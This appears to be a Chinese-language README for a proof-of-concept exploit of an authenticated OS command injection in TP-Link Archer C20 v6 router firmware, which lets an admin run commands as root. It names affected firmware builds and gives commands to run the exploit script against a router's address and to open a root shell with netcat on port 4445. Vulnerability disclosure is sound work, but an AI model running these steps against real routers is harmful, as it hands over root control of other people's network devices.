TP-Link Archer C20 v6 Web 管理界面中存在已认证的 OS 命令注入漏洞。
BPA WAN 配置值未经充分净化便传递给 system(),使相邻网络上的已认证管理员能够以 root 身份执行命令。
由 Daniil Gordeev(totekuh)发现并报告。
0.9.1 Build 260811 的 Archer C20 v6 EU 固件0.9.1 Build 260812 的 Archer C20 v6 US 固件0.9.1 Build 260812 的 Archer C20 v6 RU 固件requests 和 pycryptodomepython3 -m pip install requests pycryptodome
python3 bpa-poc.py --target 192.168.0.1 --password '<admin-password>'
nc 192.168.0.1 4445
使用 --list-only 可枚举 WAN 实例,而不会触发命令注入。